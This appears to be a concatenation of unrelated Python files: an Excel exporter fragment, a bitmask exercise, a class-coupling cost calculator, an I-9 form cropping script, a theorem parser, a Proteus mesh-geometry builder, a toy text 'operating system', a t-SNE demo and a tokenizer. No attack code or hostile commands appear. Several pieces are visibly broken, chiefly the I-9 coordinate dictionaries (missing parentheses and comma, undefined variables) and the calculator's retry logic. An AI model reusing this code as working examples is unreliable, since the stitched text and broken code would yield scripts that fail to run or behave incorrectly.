f.write(lua.encode('UTF-8'))
f.close()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Export excle to assigned file, now support [json, lua]', prog='etox')
parser.add_argument('-v', '--version', action='version', version='%(prog)s v1.0')
parser.add_argument('-m', help='Use mainbook mode, otherwise will use singlebook mode.', action='store_true')
parser.add_argument("-i", '--input', help='Input filename', type=str)
parser.add_argument("-o", '--output', help='Output filepath', type=str)
args = parser.parse_args()
if not args.m:
export_single_book()
else:
export_main_book()
|
for tc in range(int(input())) :
n, k = list(map(int, input().split()))
result = 0
for i in range(1<<12) :
item = []
for j in range(12) :
if i & 1<<j :
item.append(j+1)
if sum(item) == k and len(item) == n :
result+=1
print(f'#{tc+1} {result}')
|
'''
extract communication cost between classes from workflow.csv
'''
import sys
import csv
METHODDict = dict() #dict[methodName] = methodID
CLASSDict = dict() #dict[className] = classID
CLASSID2NAMEDict = dict() #dict[classID] = className
METHODEdgeDict = dict() # dict[mid1][mid2] = edgeIndex
METHODEdgeList = list() # list[edgeIndex] = MethodEdge(.)
class MethodEdge:
def __init__(self, callerID, calleeID, para2List, return2Str):
self.callerID = callerID
self.calleeID = calleeID
self.para2List = para2List
self.return2Str = return2Str
'''
class ComCost:
def __int__(self, className1, className2, call, para_num, ret_num, call_freq, para_num_freq, ret_num_freq, total, total_freq):
self.className1 = className1
self.className2 = className2
self.call = call
self.para_num = para_num
self.ret_num = ret_num
self.call_freq = call_freq
self.para_num_freq = para_num_freq
self.ret_num_freq = ret_num_freq
self.total = total
self.total_freq = total_freq
'''
def readCSV(fileName):
methodDict = dict()
classDict = dict()
classID2NameDict = dict()
resList = list()
methodIndex = 0
classIndex = 0
with open(fileName, 'r', newline="") as fp:
reader = csv.reader(fp)
for each in reader:
[traceID, order, stype, callerName, calleeName, m1_para, m2_para, className1, className2, m1_return, m2_return, addweight] = each
if traceID == 'traceID':
continue
callerName = callerName + '(' + m1_para + ')'
calleeName = calleeName + '(' + m2_para + ')'
if callerName not in methodDict:
methodDict[callerName] = methodIndex
methodIndex += 1
if calleeName not in methodDict:
methodDict[calleeName] = methodIndex
methodIndex += 1
if className1 not in classDict:
classDict[className1] = classIndex
classID2NameDict[classIndex] = className1
classIndex += 1
if className2 not in classDict:
classDict[className2] = classIndex
classID2NameDict[classIndex] = className2
classIndex += 1
tmp = [ methodDict[callerName], methodDict[calleeName], m2_para, m2_return , classDict[className1], classDict[className2]]
resList.append(tmp)
return methodDict, classDict, classID2NameDict, resList
def getParalist(m2_para):
arr = m2_para.split(',')
if arr[0] == '':
m2_para = list()
else:
m2_para = arr
return m2_para
def genMethodEdge(initList):
methodEdgeDict = dict() #edgeDict[m1ID][m2ID] = edgeIndex
methodEdgeList = list() #[index1] = MethodEdge()
methodEdgeIndex = 0
for each in initList:
#methodedge
[methodID1, methodID2, m2_para, m2_return, classID1, classID2] = each
m2_paraList = getParalist(m2_para)
if methodID1 not in methodEdgeDict:
oneEdge = MethodEdge(methodID1, methodID2, m2_paraList, m2_return)
methodEdgeList.append(oneEdge)
methodEdgeDict[methodID1] = dict()
methodEdgeDict[methodID1][methodID2] = methodEdgeIndex
methodEdgeIndex += 1
else:
if methodID2 not in methodEdgeDict[methodID1]:
oneEdge = MethodEdge(methodID1, methodID2, m2_paraList, m2_return)
methodEdgeList.append(oneEdge)
methodEdgeDict[methodID1][methodID2] = methodEdgeIndex
methodEdgeIndex += 1
return methodEdgeDict, methodEdgeList
# include method1 from method method2 within a same class
def process(initList):
classEdgeDict = dict() #dict[c1ID][c2ID] = [MethodEdge1: freq1, MethodEdge2:freq2, ...]
for each in initList:
#methodedge
[methodID1, methodID2, m2_para, m2_return, classID1, classID2] = each
#add into classEdge
currEdgeIndex = METHODEdgeDict[methodID1][methodID2]
if classID1 not in classEdgeDict: #dict[c1ID][c2ID] = [MethodEdge1: freq1, MethodEdge2:freq2, ...]
classEdgeDict[classID1] = dict()
classEdgeDict[classID1][classID2] = dict()
classEdgeDict[classID1][classID2][currEdgeIndex] = 1
else:
if classID2 not in classEdgeDict[classID1]:
classEdgeDict[classID1][classID2] = dict()
classEdgeDict[classID1][classID2][currEdgeIndex] = 1
else:
if currEdgeIndex not in classEdgeDict[classID1][classID2]:
classEdgeDict[classID1][classID2][currEdgeIndex] = 1
else:
classEdgeDict[classID1][classID2][currEdgeIndex] += 1
return classEdgeDict
#dict[c1ID][c2ID] = [MethodEdge1: freq1, MethodEdge2:freq2, ...]
#NOTICE: exclude class to class within itself
def formatProcess(classEdgeDict):
resList = list()
for classID1 in classEdgeDict:
for classID2 in classEdgeDict[classID1]:
if classID2 == classID1: #NOTICE: exclude class to class within itself
continue
sum_call = 0
sum_call_freq = 0
sum_para_num = 0
sum_para_num_freq = 0
sum_ret_num = 0
sum_ret_num_freq = 0
for methodEdgeIndex in classEdgeDict[classID1][classID2]:
freq = classEdgeDict[classID1][classID2][methodEdgeIndex]
para_num = len(METHODEdgeList[methodEdgeIndex].para2List)
if METHODEdgeList[methodEdgeIndex].return2Str == '':
ret_num = 0
else:
ret_num = 1
para_num_freq = para_num * freq
ret_num_freq = ret_num * freq
sum_call += 1
sum_call_freq += freq
sum_para_num += para_num
sum_para_num_freq += para_num_freq
sum_ret_num += ret_num
sum_ret_num_freq += ret_num_freq
total = sum_ret_num + sum_para_num
total_freq = sum_ret_num_freq + sum_para_num_freq
className1 = CLASSID2NAMEDict[classID1]
className2 = CLASSID2NAMEDict[classID2]
oneList = [className1, className2, sum_call, sum_para_num, sum_ret_num, sum_call_freq, sum_para_num_freq, sum_ret_num_freq, total, total_freq]
resList.append(oneList)
return resList
def writeCSV(listlist, fileName):
with open(fileName, 'w', newline="") as fp:
writer = csv.writer(fp)
writer.writerow(['className1', 'className2', 'call', 'p_num', 'r_num', 'call_f', 'p_num_f', 'r_num_f', 'total', 'total_f'])
writer.writerows(listlist)
print (fileName)
#python pro.py workflow.csv outfile.csv
if __name__ == '__main__':
workflowFileName = sys.argv[1]
outfileName = sys.argv[2]
[METHODDict, CLASSDict, CLASSID2NAMEDict, initEdgeList] = readCSV(workflowFileName)
[METHODEdgeDict, METHODEdgeList] = genMethodEdge(initEdgeList)
#dict[c1ID][c2ID] = [MethodEdge1: freq1, MethodEdge2:freq2, ...]
classEdgeDict = process(initEdgeList)
resultList = formatProcess(classEdgeDict)
writeCSV(resultList, outfileName)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 24 15:19:51 2018
@author: Brandon Croarkin
"""
from PIL import Image
import os
import re
#listing out the (x1, y1, x2, y2) coordinates of information on each of
#the different forms
image_coords_020209 = {'LastName':(.055*width,.168*height,.37*width,.205*height),
'FirstName': (.368*width,.169*height,.61*width,.205*height),
'DateOfBirth': (.688*width,.205*height,.95*width,.240*height),
'SocialSecurity': (.688*width,.241*height,.95*width,.275*height),
'Attestation': (.49*width,.292*height,.515*width,.365*height),
'Alien/AdmissionNo1': (.515*width,.325*height,.945*width,.350*height),
'Alien/AdmissionNo2': (.515*width,.346*height,.945*width,.365*height),
'StreetAddress': (.055*width,.205*height,.58*width,.240*height),
'City': (.055*width,.241*height,.35*width,.275*height),
'State': (.345*width,.241*height,.58*width,.275*height),
'Zip': (.58*width,.241*height,.688*width,.275*height),
'WorkAuthorization': (.515*width,.362*height,.945*width,.377*height),
'Translator': (.513*width,.433*height,.94*width,.47*height),
'DocumentTitle1': (.05*width,.564*height,.363*width,.59*height),
'DocumentTitle2': (.38*width,.564*height,.65*width,.59*height),
'DocumentTitle3': (.7*width,.564*height,.95*width,.59*height),
'DocumentNumber1': (.05*width,.606*height,.363*width,.63*height),
'DocumentNumber2': (.38*width,.606*height,.65*width,.63*height),
'DocumentNumber3': (.7*width,.606*height,.95*width,.63*height),
'DocumentNumber4': (.05*width,.645*height,.363*width,.665*height),
'DateOfHire': (.053*width,.712*height,.278*width,.728*height),
'MiddleInitial': (.610*width,.169*height,.686*width,.205*height),
'ApartmentNo': (.58*width,.205*height,.685*width,.240*height)}
image_coords_030813_pg1 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_030813_pg2 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_050787 = {'LastName':(.069*width,.1215*height,.38*width,.1525*height),
'FirstName': (.38*width,.1215*height,.56*width,.1525*height),
'DateOfBirth': (.07*width,.1819*height,.51*width,.211*height),
'SocialSecurity': (.51*width,.1819*height,.91*width,.211*height),
'Attestation': (.085*width,.228*height,.12*width,.275*height),
'Alien/AdmissionNo1': (.503*width,.24*height,.655*width,.26*height),
'Alien/AdmissionNo2': (.732*width,.26*height,.911*width,.276*height),
'Alien/AdmissionNo3': (.235*width,.2735*height,.369*width,.29*height),
'StreetAddress': (.08*width,.1519*height,.38*width,.182*height),
'City': (.38*width,.1519*height,.56*width,.182*height),
'State': (.56*width,.1519*height,.735*width,.182*height),
'Zip': (.735*width,.1519*height,.92*width,.182*height),
'WorkAuthorization': (),
'Translator': (.51*width,.394*height,.833*width,.424*height),
'DocumentTitle1': (.06*width,.632*height,.09*width,.72*height),
'DocumentTitle2': (.38*width,.61*height,.4*width,.73*height),
'DocumentTitle3': (.7*width,.61*height,.72*width,.73*height),
'DocumentNumber1': .076*width,.782*height,.315*width,.8*height
'DocumentNumber2': .3913*width,.782*height,.63*width,.8*height
'DocumentNumber3': (.712*width,.782*height,.95*width,.8*height),
'DateOfHire': (.785*width,.925*height,.95*width,.953*height),
'MiddleInitial': (.56*width,.1215*height,.74*width,.1525*height)}
image_coords_053105 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_060507 = {'LastName':(.055*width,.185*height,.36*width,.221*height),
'FirstName': (.36*width,.185*height,.58*width,.221*height),
'DateOfBirth': (.69*width,.2215*height,.95*width,.25*height),
'SocialSecurity': (.688*width,.257*height,.94*width,.291*height),
'Attestation': (.45*width,.306*height,.4752*width,.355*height),
'Alien/AdmissionNo1': (.71*width,.318*height,.95*width,.332*height),
'Alien/AdmissionNo2': (.61*width,.351*height,.95*width,.37*height),
'StreetAddress': (.055*width,.2215*height,.57*width,.2454*height),
'City': (.055*width,.257*height,.35*width,.291*height),
'State': (.35*width,.257*height,.57*width,.291*height),
'Zip': (.58*width,.257*height,.685*width,.291*height),
'WorkAuthorization': (.652*width,.334*height,.95*width,.351*height),
'TranslatorName': (.515*width,.433*height,.88*width,.469*height),
'TranslatorAddress': (.1*width,.47*height,.677*width,.497*height),
'TranslatorSignDate': (.678*width,.47*height,.9*width,.497*height)
'DocumentTitle1': (.14*width,.57*height,.36*width,.59*height),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (.58*width,.185*height,.685*width,.221*height),
'ApartmentNo': (.58*width,.2215*height,.685*width,.2454*height)}
image_coords_080709 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_111416_pg1 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_111416_pg2 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_071717_pg1 = {'LastName':(.077*width,.229*height,.356*width,.271*height),
'FirstName': (.355*width,.233*height,.597*width,.272*height),
'DateOfBirth': (.077*width,.3034*height,.26*width,.3465*height),
'SocialSecurity': (.26*width,.305*height,.452*width,.349*height),
'Attestation': (.077*width,.405*height,.108*width,.49*height),
'Alien/AdmissionNo1': (2800,3210,3850,3350),
'Alien/AdmissionNo2': (1900,3740,3100,3950),
'Alien/AdmissionNo3': (1420,3930,3100,4160),
'Alien/AdmissionNo4': (1350,4110,3100,4320),
'StreetAddress': (.077*width,.266*height,.41*width,.306*height),
'City': (.505*width,.271*height,.745*width,.309*height),
'State': (.746*width,.271*height,.81*width,.309*height),
'Zip': (.81*width,.271*height,.948*width,.311*height),
'WorkAuthorization': (2880,3350,3620,3500),
'TranslatorLN': (420,5440,2650,5680),
'TranslatorFN': (2660,5430,4600,5680),
'DocumentTitle': (),
'DocumentNumber': (),
'DateOfHire': (),
'ApartmentNo': (.408*width,.271*height,.505*width,.309*height),
'MiddleInitial': (.596*width,.234*height,.696*width,.272*height),
'Email': (.450*width,.308*height,.731*width,.351*height),
'Telephone': (.729*width,.308*height,.948*width,.352*height)}
image_coords_071717_pg2 = {'LastName':(.077*width,.229*height,.356*width,.271*height),
'FirstName': (.355*width,.233*height,.597*width,.272*height),
'DateOfBirth': (.077*width,.3034*height,.26*width,.3465*height),
'SocialSecurity': (.26*width,.305*height,.452*width,.349*height),
'Attestation': (.077*width,.405*height,.108*width,.49*height),
'Alien/AdmissionNo1': (2800,3210,3850,3350),
'Alien/AdmissionNo2': (1900,3740,3100,3950),
'Alien/AdmissionNo3': (1420,3930,3100,4160),
'Alien/AdmissionNo4': (1350,4110,3100,4320),
'StreetAddress': (.077*width,.266*height,.41*width,.306*height),
'City': (.505*width,.271*height,.745*width,.309*height),
'State': (.746*width,.271*height,.81*width,.309*height),
'Zip': (.81*width,.271*height,.948*width,.311*height),
'WorkAuthorization': (2880,3350,3620,3500),
'TranslatorLN': (420,5440,2650,5680),
'TranslatorFN': (2660,5430,4600,5680),
'DocumentTitle': (),
'DocumentNumber': (),
'DateOfHire': (),
'ApartmentNo': (.408*width,.271*height,.505*width,.309*height),
'MiddleInitial': (.596*width,.234*height,.696*width,.272*height),
'Email': (.450*width,.308*height,.731*width,.351*height),
'Telephone': (.729*width,.308*height,.948*width,.352*height)}
def crop(image_path, coords, saved_location):
"""
@param image_path: The path to the image to edit
@param coords: A tuple of x/y coordinates (x1, y1, x2, y2)
@param saved_location: Path to save the cropped image
"""
image_obj = Image.open(image_path)
cropped_image = image_obj.crop(coords)
cropped_image.save(saved_location)
cropped_image.show()
if __name__ == '__main__':
#image = 'Python Crops/Original.png'
#Make a vector of PNG files in a directory so it can repeat
#process on all files in directory
images = []
folder_location = 'C:\\Users\\Brandon Croarkin\\Documents\\GreenZone\\OCR\\I9 Forms - PNG\\TextCleaned'
for image in os.listdir(folder_location):
if image.endswith(".png"):
images.append(image)
for image in images:
#image_name removes the Python Crops and .png from the image variable to
#give the file a unique file name
image_names = []
image_names = image_names.append(re.search(r'(.*?)(?=\.)',image).group())
#loop through the coordinates for each attribute and create a new image
for key, value in image_coords_071717_pg1.items():
crop(image, value, 'CroppedImages/' + image_name + '_' + key +'.png')
#delete the original image so NiFi doesn't repeat the process on the image
#os.remove('Python Crops/' + image)
#croppedImages_Folder_Location = 'C:\\Users\\Brandon Croarkin\\Documents\\GreenZone\\OCR\\PythonCroppedImages'
#croppedImages = []
#for image in os.listdir(croppedImages_Folder_Location):
# if image.endswith(".png"):
# croppedImages.append(image)
#
#for image in croppedImages:
# originalFile = re.search('r(.*?)(?=\_)',image).group()
#find original file (what comes before the underscore)
##################TESTING
##Below is just for testing for the coordinates
if __name__ == '__main__':
image = 'i-9_06-05-07(Filled)page-2.png'
im = Image.open('i-9_06-05-07(Filled)page-2.png')
width, height = im.size
crop(image, (.39*width,.57*height,.62*width,.585*height),
'CroppedImages/Test.png')
|
from poc.classes.AuxISourceAnalyser import AuxISourceAnalyser
from poc.classes.AuxInterpretation import AuxInterpretation
from poc.classes.AuxContext import AuxContext
from poc.classes.ContextSignature import ContextSignature
class ContextTheoremLikeStatement:
@staticmethod
def start(i: AuxISourceAnalyser, parsing_info: AuxInterpretation):
if parsing_info.get_cst() == 'thm' or parsing_info.get_cst() == 'theorem':
i.context.push_context(AuxContext.theoremLikeStmtThm, i.get_debug_parsing_info(parsing_info))
elif parsing_info.get_cst() == 'prop' or parsing_info.get_cst() == 'proposition':
i.context.push_context(AuxContext.theoremLikeStmtProp, i.get_debug_parsing_info(parsing_info))
elif parsing_info.get_cst() == 'lem' or parsing_info.get_cst() == 'lemma':
i.context.push_context(AuxContext.theoremLikeStmtLem, i.get_debug_parsing_info(parsing_info))
elif parsing_info.get_cst() == 'cor' or parsing_info.get_cst() == 'corollary':
i.context.push_context(AuxContext.theoremLikeStmtCor, i.get_debug_parsing_info(parsing_info))
elif parsing_info.get_cst() == 'conj' or parsing_info.get_cst() == 'conjecture':
i.context.push_context(AuxContext.theoremLikeStmtConj, i.get_debug_parsing_info(parsing_info))
else:
raise AssertionError("Unexpected keyword in ContextTheoremLikeStatement.start " + parsing_info.get_cst())
ContextSignature.start(i, parsing_info)
@staticmethod
def stop(i: AuxISourceAnalyser, parsing_info: AuxInterpretation):
if i.context.is_parsing_context([AuxContext.theoremLikeStmtThm]):
i.context.pop_context([AuxContext.theoremLikeStmtThm], i.get_debug_parsing_info(parsing_info))
elif i.context.is_parsing_context([AuxContext.theoremLikeStmtProp]):
i.context.pop_context([AuxContext.theoremLikeStmtProp], i.get_debug_parsing_info(parsing_info))
elif i.context.is_parsing_context([AuxContext.theoremLikeStmtLem]):
i.context.pop_context([AuxContext.theoremLikeStmtLem], i.get_debug_parsing_info(parsing_info))
elif i.context.is_parsing_context([AuxContext.theoremLikeStmtCor]):
i.context.pop_context([AuxContext.theoremLikeStmtCor], i.get_debug_parsing_info(parsing_info))
elif i.context.is_parsing_context([AuxContext.theoremLikeStmtConj]):
i.context.pop_context([AuxContext.theoremLikeStmtConj], i.get_debug_parsing_info(parsing_info))
else:
raise AssertionError("Unexpected context in ContextTheoremLikeStatement.stop " + parsing_info.get_cst())
i.pop_node() # forget the theorem-like statement node
i.parse_list.append(parsing_info)
|
# coding: utf-8
# In[218]:
import numpy as np
#import matplotlib.pyplot as plt
from proteus import SpatialTools as st
import os
from proteus import Domain
def get_yz(filename):
data=st.getInfoFromSTL(str(filename))
x=data[0][0][0]
yz=[]
for i in range(len(data[0])):
if data[0][i][0] >= 0.9999*x and data[0][i][0] <= 1.0001*x:
yz.append([0.0,data[0][i][1],data[0][i][2]])
return yz
def yz2xy(yz):
xy=[]
for i in range(len(yz)):
xy.append([yz[i][1],yz[i][2]])
xy.sort(key=lambda tup: tup[0])
return xy
def clipds(vrts):
endl=vrts[-3][0]
newl=[]
for i in range(len(vrts)):
if (vrts[i][0]> 426) and (vrts[i][0]<endl):
pass
else:
newl.append(vrts[i])
return newl
def clipus(vrts):
begl=vrts[0][0]
newl=[]
for i in range(len(vrts)):
if (vrts[i][0]> begl) and (vrts[i][0]<303):
pass
else:
newl.append(vrts[i])
return newl
#def plots(fig):
# plt.figure(figsize=(40,10))
# plt.scatter(np.array(fig)[:,0],np.array(fig)[:,1])
# plt.show()
def v_flags(vertices,boundaryTags):
vertexFlags=[]
for i in range(len(vertices)):
if i < (len(vertices)-3):
vertexFlags.append(boundaryTags['bottom'])
elif i == (len(vertices)-3):
vertexFlags.append(boundaryTags['outflow'])
elif i == (len(vertices)-2):
vertexFlags.append(boundaryTags['top'])
elif i == (len(vertices)-1):
vertexFlags.append(boundaryTags['inflow'])
return vertexFlags
def segs(vertices):
segments=[]
for i in range(len(vertices)):
a=[]
if i < len(vertices)-1:
segments.append([i,i+1])
else:
segments.append([i,0])
return segments
def s_flags(segments,boundaryTags):
segmentFlags=[]
for i in range(len(segments)):
if i < (len(segments)-3):
segmentFlags.append(boundaryTags['bottom'])
elif i == (len(segments)-3):
segmentFlags.append(boundaryTags['outflow'])
elif i == (len(segments)-2):
segmentFlags.append(boundaryTags['top'])
elif i == (len(segments)-1):
segmentFlags.append(boundaryTags['inflow'])
return segmentFlags
def geom_transform(vertices):
a=min(np.array(vertices)[:,0])
b=min(np.array(vertices)[:,1])
for i in range(len(vertices)):
vertices[i]=[vertices[i][0]-a,vertices[i][1]-b]
return vertices
def top(vertices,top):
vertices[-1][1]=top
vertices[-2][1]=top
return vertices
def ups_len(vertices,upslen):
if upslen==None:
return vertices
else:
a=vertices[1][0]-vertices[0][0]
for i in range(len(vertices)):
if (i > 0 and i < len(vertices)-1):
vertices[i][0]=(vertices[i][0]-a+upslen)
else:
pass
return vertices
def dwns_len(vertices,dwnslen):
if dwnslen ==None:
return vertices
else:
a=vertices[-3][0]-vertices[-4][0]
for i in range(len(vertices)):
if (i < len(vertices)-1 and i > len(vertices)-4):
vertices[i][0]=(vertices[i][0]-a+dwnslen)
else:
pass
return vertices
def deldup(vertices):
a=[vertices[0]]
for i in range(len(vertices)):
if i == 0 or vertices[i]==vertices[i-1]:
pass
else:
a.append(vertices[i])
return a
def makecsv():
a=get_yz('bed1.stl')
b=get_yz('bed2.stl')
c=get_yz('conc.stl')
d=a+b+c
np.savetxt("full_bed.csv",d, delimiter=",")
f=[]
e=yz2xy(d)
f=e
f.append([max(np.array(e)[:,0]),max(np.array(get_yz('outlet.stl'))[:,2])])
f.append([min(np.array(f)[:,0]),max(np.array(get_yz('outlet.stl'))[:,2])])
g=f
h=clipus(clipds(g))
i=deldup(h)
np.savetxt("domain.csv",f, delimiter=",")
# np.savetxt("domain_clip.csv",h, delimiter=",")
np.savetxt("domain_clip.csv",i, delimiter=",")
boundaries=['bottom','outflow','top','inflow']
boundaryTags=dict([(key,i+1) for (i,key) in enumerate(boundaries)])
vertices=np.genfromtxt("domain_clip.csv", delimiter=",").tolist()
vertexFlags=v_flags(vertices,boundaryTags)
segments=segs(vertices)
segmentFlags=s_flags(segments,boundaryTags)
|
"""
Author: Thomas.JR
THMS OPERATING SYSTEM
version: pre-alpha v.0.0.010
"""
#program functions
def help():
def git():
print("Welcome to System Helper. (VERSION: 0.00.1")
print("Use these commands to make guidelines:")
print(" /help.settings: To make guidelines for SETTINGS Program")
def chekk():
hihelp = str(input(">>> "))
if (hihelp == "/help.settings"):
print("Awesome!")
chekk()
else:
print("Invaild function!")
chekk()
git()
chekk()
def iSolver():
#variable
hello = "\nHi! Welcome to iSolver!"
greeting = "\nChoose the experession that linked to numbers to solve! \n (1) (x+y+z)^2 \n (2) (x+y)^n \n (3) ((x^2)-x)/(n-x) \n (4) x^3 + y^3 + y^2"
#functions
def experession1(): #(x+y+z)^2
x = int(input("-------\nType x:"))
y = int(input("-------\nType y:"))
z = int(input("-------\nType z:"))
p = "(%d + %d + %d)^2" % (x,y,z)
onesum = (x+y+z) ** 2
print("------------------------------------------------------\nExpression 1: %s \n Input x,y,z respectively: %d, %d, %d \n Value of experession: %d" % (p,x,y,z,onesum))
print("-------------------------------")
finisher()
def experession2(): #(x+y)^n
x = int(input("-------\nType x:"))
y = int(input("-------\nType y:"))
n = int(input("-------\nType exponent number:"))
p = "(%d + %d)^%d" % (x,y,n)
twosum = (x+y) ** n
print("------------------------------------------------------\nExpression 2: %s \n Input x,y respectively: %d, %d \n Exponent: %d \n Value of experession: %d" % (p,x,y,n,twosum))
print("-------------------------------")
finisher()
def experession3(): # ((x^2)-x)/(n-x)
x = int(input("-------\nType x:"))
n = int(input("-------\nType n:"))
if (x == n):
print("SystemError: This will lead to division by zero! \n")
print("-------------------------------------")
finisher()
else:
p = "((%d^2)-%d)/(%d-%d)" % (x,x,x,n)
threesum = ((x ** 2) - x)/(n-x)
print("------------------------------------------------------\nExpression 3 %s \n Input x,n respectively: %d, %d \n Value of experession: %d" % (p,x,n,threesum))
print("-------------------------------")
finisher()
def experession4(): # x^3 + y^3 + z^3
x = int(input("-------\nType x:"))
y = int(input("-------\nType y:"))
z = int(input("-------\nType z:"))
p = "%d ^ 3 + %d ^ 3 + %d ^ 3" % (x,y,z)
foursum = x**3 + y**3 + z**3
print("------------------------------------------------------\nExpression 2: %s \n Input x,y respectively: %d, %d, %d \n Value of experession: %d" % (p,x,y,z,foursum))
print("-------------------------------")
finisher()
def finisher():
command = str(input("Execute: \n try_again : if you want to try this expression again \n try_other: if you want to try another expression \n exit: if you don't want to calculate any more \n \n >>>"))
if (command == "try_again"):
experession3()
elif (command == "try_other"):
print("-------------------------")
main()
elif (command == "exit"):
exIt()
def sTaRt():
greeTer()
kUrso()
def kUrso():
stringTo = str(input("\n>>> "))
if (stringTo == "calExper"):
main()
else:
print("Function undefined.\n")
liSt()
kUrso()
def liSt():
print("What do you want to do?\n -calExper: Calculate listed experessions.")
def greeTer():
print(hello)
liSt()
def main(): # main function
print(greeting)
exchoice = int(input("Choose the type of experession you want to solve\n>>> "))
if (exchoice == 1):
experession1()
elif (exchoice == 2):
experession2()
elif (exchoice == 3):
experession3()
elif (exchoice == 4):
experession4()
else:
print("Experession unavailable!")
errorStartAgain()
def errorStartAgain():
excher = int(input("Please type the number that represents the experession in the list! \n"-------------------------"\n>>> "))
if (excher == 1):
experession1()
elif (excher == 2):
experession2()
elif (excher == 3):
experession3()
elif (excher == 4):
experession4()
else:
print("Experession unavailable!")
errorStartAgain()
def exIt():
print("Thanks for using our product!")
mainIe()
#Start
sTaRt()
#variables
cRedits = "THMS OPERATING SYSTEM \nCopyright 2017, Thms Studios.\nVersion: pre-alpha v.0.0.001"
#system information
print(cRedits)
#system functions
def mainIe():
start = str(input("\nC:\THMS >>> "))
if (start == "prg(iSolver)" or start == "iSolver"):
iSolver()
elif (start == "shutdown"):
shutDown()
elif (start == "/help"):
help()
else:
print("'%s' is not recognized as an internal or external command, operable program or batch file !" % (start))
mainIe()
def shutDown():
print("Goodbye!")
#user command input
mainIe()
|
# libray imports
import winsound
import numpy as np
from sklearn import manifold
# application imports.
from data_generator import generate_data_gausian_archimedean_spiral
from data_visualization import plot_data
def sound ( f, p, n ):
for i in range ( n ):
winsound.Beep ( f, p )
# Function: Main program function.
def main ():
# Initialize program.
sound ( 200, 80, 2 )
# Configure data parameters.
xd = 0.5
yd = 0.5
turn_count = 2.0
sigma = 0.03
spiral_count = 2
data_count = 1000 * 8
minifold_enabled = True
# Generate data.
data = []
data = generate_data_gausian_archimedean_spiral ( data, xd, yd, sigma, turn_count, spiral_count, data_count )
# Plot data
np_data = np.array ( data )
plot_data ( np_data, markersize = 1, alpha = 0.5, auto_limit_enabled = True )
# Learn manifolds.
if minifold_enabled:
perplexity = 20
n_components = 2
manifold_transform = manifold.TSNE ( n_components = n_components, perplexity = perplexity, init = 'pca', random_state = 0 )
x = data
y = manifold_transform.fit_transform ( x )
# Plot manifold transform.
np_data = np.array ( y )
plot_data ( np_data, markersize = 1, alpha = 0.5, auto_limit_enabled = False )
# Print program data.
print ( 'data_count = ' + str ( len(data) ) )
sound ( 12000, 80, 2 )
# Program entry point.
main () |
"""
Author: Marion Owera
Date Written: Feb 25, 2018
Description: Temporary sent_tokenizer lang to, may problema pa kasi dun sa tokenizer ni Jeremy.
"""
import re
import json
def sent_tokenize(inp,fh=False):
sym =r"([,\"\'])"
inp = re.sub(r"(\w+)"+sym+r"(\w+)"+sym+r"(\w+)",r"\1 \2 \3 \4 \5",inp)
inp = re.sub(r"(\w+)"+sym+r"(\w+)",r"\1 \2 \3",inp)
inp = re.sub(sym+r"(\w+)",r"\1 \2",inp)
inp = re.sub(r"(\w+)"+sym,r"\1 \2",inp)
inp = re.sub(r"(\w+)(\W)$",r"\1 \2",inp)
inp = inp.split()
if fh:
file = open("et/data/temp/sent_tokenizer.json","w")
file.write(json.dumps(inp,indent=4))
file.close()
return inp
